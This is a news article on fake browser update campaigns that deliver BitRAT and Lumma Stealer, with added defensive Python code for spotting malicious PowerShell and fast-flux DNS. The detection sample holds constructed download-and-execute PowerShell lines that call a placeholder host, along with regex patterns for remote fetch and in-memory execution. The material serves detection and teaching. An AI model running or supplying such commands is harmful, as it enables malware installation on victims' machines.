Fake Browser Updates Deliver BitRAT and Lumma Stealer Malware

Fake web browser updates are being used to deliver remote access trojans (RATs) and information stealer malware such as BitRAT and Lumma Stealer (aka LummaC2). "Fake browser updates have been responsible for numerous malware infections, including those of the well-known SocGholish malware," cybersecurity firm eSentire said in a new report. "In April 2024, we observed FakeBat being distributed via similar fake update mechanisms."

The attack chain starts when prospective targets visit a booby-trapped website that contains JavaScript code designed to redirect users to a bogus browser update page. The redirected web page comes embedded with a download link to a ZIP archive file ("Update.zip") that's hosted on Discord and downloaded automatically to the victim's device. It's worth pointing out that threat actors commonly use Discord as an attack vector, with recent research from Bitdefender uncovering more than 50,000 dangerous links distributing malware, phishing campaigns, and spam over the past six months.

Present within the ZIP archive file is another JavaScript file ("Update.js"), which triggers the execution of PowerShell scripts responsible for retrieving additional payloads, including BitRAT and Lumma Stealer, from a remote server in the form of PNG image files. Also retrieved in this manner are PowerShell scripts to establish persistence and a .NET-based loader that's primarily used to launch the final-stage malware. eSentire hypothesized that the loader is likely advertised as a "malware delivery service," since the same loader is used to deploy both BitRAT and Lumma Stealer.

BitRAT is a feature-rich RAT that allows attackers to harvest data, mine cryptocurrency, download additional binaries, and remotely commandeer the infected hosts. Lumma Stealer, a commodity stealer malware available for $250 to $1,000 per month since August 2022, offers the ability to capture information from web browsers, crypto wallets, and other sensitive details. "The fake browser update lure has become common amongst attackers as a means of entry to a device or network," the company said, adding it "showcases the operator's ability to leverage trusted names to maximize reach and impact."

While such attacks typically leverage drive-by downloads and malvertising techniques, ReliaQuest, in a report published last week, said it discovered a new variant of the ClearFake campaign that tricks users into copying, pasting, and manually executing malicious PowerShell code under the guise of a browser update. Specifically, the malicious website claims that "something went wrong while displaying this webpage" and instructs the site visitor to install a root certificate to resolve the problem by following a series of steps, which involves copying obfuscated PowerShell code and running it in a PowerShell terminal. Because the victim launches the code themselves, there is no browser download for file-reputation controls to inspect; detection has to come from process-creation telemetry and PowerShell script block logging instead.

"Upon execution, the PowerShell code performs various functions, including clearing the DNS cache, displaying a message box, downloading further PowerShell code, and installing 'LummaC2' malware," the company said. According to data shared by the cybersecurity company, Lumma Stealer emerged as one of the most prevalent information stealers in 2023, alongside RedLine and Raccoon.
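Both delivery paths described above end in PowerShell: the Update.zip chain has a script host (Update.js) spawn it, and the ClearFake variant has the victim start it by hand with a pasted command that flushes the DNS cache, shows a message box and fetches more code. The detection logic below is an added example, not ReliaQuest's or eSentire's, run over constructed Sysmon-style process-creation events. It flags (a) powershell.exe whose parent is wscript.exe or cscript.exe and (b) a command line, after decoding any -EncodedCommand blob, that carries at least three of four indicators. The indicator regexes are assumptions about how the reported behaviour would usually be written (ipconfig /flushdns or Clear-DnsClientCache, MessageBox::Show, Invoke-WebRequest/DownloadString, Invoke-Expression); the campaign's actual obfuscated script is not quoted in the article and is not reproduced here. Host names and paths in the samples are constructed.

```python
import base64
import re

POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Assumed spellings of the three things the ClearFake script is reported to do
# (flush DNS, show a message box, fetch more code) plus in-memory execution.
INDICATORS = {
    "dns-cache-flush": re.compile(r"ipconfig(\.exe)?\s+/flushdns|clear-dnsclientcache", re.I),
    "message-box": re.compile(r"messagebox\]::show|\.popup\(", re.I),
    "remote-fetch": re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|net\.webclient", re.I),
    "in-memory-exec": re.compile(r"invoke-expression|\biex\b", re.I),
}

# -EncodedCommand and its accepted abbreviations, followed by a base64 token.
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_for_powershell(script: str) -> str:
    """Base64 of UTF-16LE text, the encoding -EncodedCommand expects.
    Used here only to build the constructed sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def expand_command_line(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (if any) so the indicator
    regexes see the script itself rather than an opaque base64 blob."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} {decoded}"


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> list:
    """Return the names of the rules a process-creation event triggers."""
    hits = []
    if _basename(event["image"]) not in POWERSHELL:
        return hits
    cmd = expand_command_line(event["command_line"])
    if _basename(event["parent_image"]) in SCRIPT_HOSTS:
        hits.append("script-host-spawned-powershell")  # Update.js -> PowerShell pattern
    matched = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if len(matched) >= 3:
        hits.append("paste-and-run-indicators")  # ClearFake-style pasted command
    return hits


def scan(events) -> dict:
    """Map event id -> triggered rules, for flagged events only."""
    return {e["id"]: analyze(e) for e in events if analyze(e)}


# Constructed sample events (not real telemetry). update.example is a placeholder host.
PASTE_SCRIPT = (
    "ipconfig /flushdns; Add-Type -AssemblyName System.Windows.Forms; "
    "[System.Windows.Forms.MessageBox]::Show('Root certificate installed'); "
    "iex (iwr 'http://update.example/fix.ps1' -UseBasicParsing).Content"
)
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe", "image": PS_EXE,
     "command_line": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users\alice\Documents"},
    {"id": 2, "parent_image": r"C:\Windows\System32\wscript.exe", "image": PS_EXE,
     "command_line": "powershell.exe -w hidden -ep bypass -c \"iex (iwr 'http://update.example/stage2.png' -UseBasicParsing).Content\""},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe", "image": PS_EXE,
     "command_line": "powershell.exe -NoProfile -EncodedCommand " + encode_for_powershell(PASTE_SCRIPT)},
]

if __name__ == "__main__":
    for event_id, rules in scan(SAMPLE_EVENTS).items():
        print(event_id, rules)
```

Event 1 (an administrator listing a directory) is left alone, event 2 trips only the parent-process rule, and event 3 trips the indicator rule only because the encoded command was decoded first; matching the raw command line would have missed it. The parent-process rule is the more robust of the two, since a script host launching PowerShell is rare in normal use regardless of how the command is obfuscated.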

"The number of LummaC2-obtained logs listed for sale increased by 110% from Q3 to Q4 2023," it said. "LummaC2's rising popularity among adversaries is likely due to its high success rate, which refers to its effectiveness in successfully infiltrating systems and exfiltrating sensitive data without detection." The development comes as the AhnLab Security Intelligence Center (ASEC) disclosed details of a new campaign that uses web hards (short for web hard drive) as a conduit to distribute malicious installers for adult games and cracked versions of Microsoft Office and ultimately deploy a variety of malware such as Orcus RAT, XMRig miner, 3proxy, and XWorm.

Similar attack chains involving websites offering pirated software have led to the deployment of malware loaders like PrivateLoader and TaskLoader, which are both offered as a pay-per-install (PPI) service for other cybercriminals to deliver their own payloads. It also follows new findings from Silent Push about CryptoChameleon's "almost exclusive use" of DNSPod[.]com nameservers to support its phishing kit architecture. DNSPod, a part of the Chinese firm Tencent, has a history of providing services for malicious bulletproof hosting operators.

"CryptoChameleon uses DNSPod nameservers to engage in fast flux evasion techniques that allow threat actors to quickly cycle through large amounts of IPs linked to a single domain name," the company said. "Fast flux allows CryptoChameleon infrastructure to evade traditional countermeasures and significantly reduces the operational value of legacy point-in-time IOCs."
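Fast flux is visible in passive DNS: one hostname answers with a stream of different addresses, each with a short TTL, so an IP captured at one moment is stale soon after. The heuristic below is an added example, not Silent Push's method, run over constructed passive-DNS observations that use RFC 5737 documentation addresses. It profiles each domain (distinct IPs, distinct ASNs, mean TTL, observation window), applies assumed thresholds, and measures how many of the addresses seen at one time still resolve later, which is the point the quote makes about point-in-time IOCs. The ASN lookup is a constructed stand-in for a real BGP feed; requiring ASN diversity, not just address count, is what keeps ordinary CDN rotation (many addresses, low TTL, one provider) from being flagged.

```python
from ipaddress import ip_address
from statistics import mean

# Constructed passive-DNS observations (RFC 5737 documentation ranges only):
# (minutes since start, domain, A record, TTL). Not data from any vendor or campaign.
OBSERVATIONS = [
    # phish.example: a fresh pair of addresses across three hosters every 10 minutes, TTL 60
    (0, "phish.example", "203.0.113.10", 60), (0, "phish.example", "198.51.100.7", 60),
    (10, "phish.example", "192.0.2.44", 60), (10, "phish.example", "203.0.113.200", 60),
    (20, "phish.example", "198.51.100.99", 60), (20, "phish.example", "192.0.2.130", 60),
    (30, "phish.example", "203.0.113.77", 60), (30, "phish.example", "198.51.100.150", 60),
    # cdn.example: also rotates with TTL 60, but every address sits in one provider's network
    (0, "cdn.example", "192.0.2.1", 60), (10, "cdn.example", "192.0.2.2", 60),
    (20, "cdn.example", "192.0.2.3", 60), (30, "cdn.example", "192.0.2.4", 60),
    (40, "cdn.example", "192.0.2.5", 60),
    # static.example: one address, long TTL
    (0, "static.example", "203.0.113.5", 86400), (30, "static.example", "203.0.113.5", 86400),
]

# Constructed stand-in for an IP-to-ASN feed, keyed on the first octet; AS64496-64498 are reserved.
ASN_BY_FIRST_OCTET = {203: 64496, 198: 64497, 192: 64498}


def asn_for(ip: str) -> int:
    return ASN_BY_FIRST_OCTET.get(ip_address(ip).packed[0], 0)


def profile(observations, domain: str) -> dict:
    """Summarise how a domain's A records behave over the observation window."""
    rows = [o for o in observations if o[1] == domain]
    if not rows:
        raise KeyError(domain)
    ips = {o[2] for o in rows}
    return {
        "distinct_ips": len(ips),
        "distinct_asns": len({asn_for(ip) for ip in ips}),
        "mean_ttl": mean(o[3] for o in rows),
        "window_minutes": max(o[0] for o in rows) - min(o[0] for o in rows),
    }


def is_fast_flux(p: dict, min_ips: int = 5, min_asns: int = 3, max_ttl: int = 300) -> bool:
    """Heuristic with assumed thresholds (tune to your own telemetry): many
    addresses, spread over unrelated networks, advertised with short TTLs."""
    return p["distinct_ips"] >= min_ips and p["distinct_asns"] >= min_asns and p["mean_ttl"] <= max_ttl


def ips_at(observations, domain: str, minute: int) -> set:
    return {o[2] for o in observations if o[1] == domain and o[0] == minute}


def ioc_survival(observations, domain: str, t0: int, t1: int) -> float:
    """Fraction of the addresses captured at t0 that still resolve at t1, i.e.
    what a point-in-time IP blocklist taken at t0 is still worth at t1."""
    then, now = ips_at(observations, domain, t0), ips_at(observations, domain, t1)
    return len(then & now) / len(then) if then else 0.0


if __name__ == "__main__":
    for d in ("phish.example", "cdn.example", "static.example"):
        p = profile(OBSERVATIONS, d)
        verdict = "fast-flux" if is_fast_flux(p) else "ok"
        print(d, p, verdict, f"IOC survival 0->30 min: {ioc_survival(OBSERVATIONS, d, 0, 30):.0%}")
```

On the constructed data phish.example is flagged (8 addresses, 3 ASNs, TTL 60) and none of its minute-0 addresses are still in use at minute 30, while cdn.example rotates just as fast but stays inside one network and static.example never moves. The practical consequence matches the quote: for a fluxing domain, block the name (or the nameserver pattern) rather than the addresses it happened to resolve to.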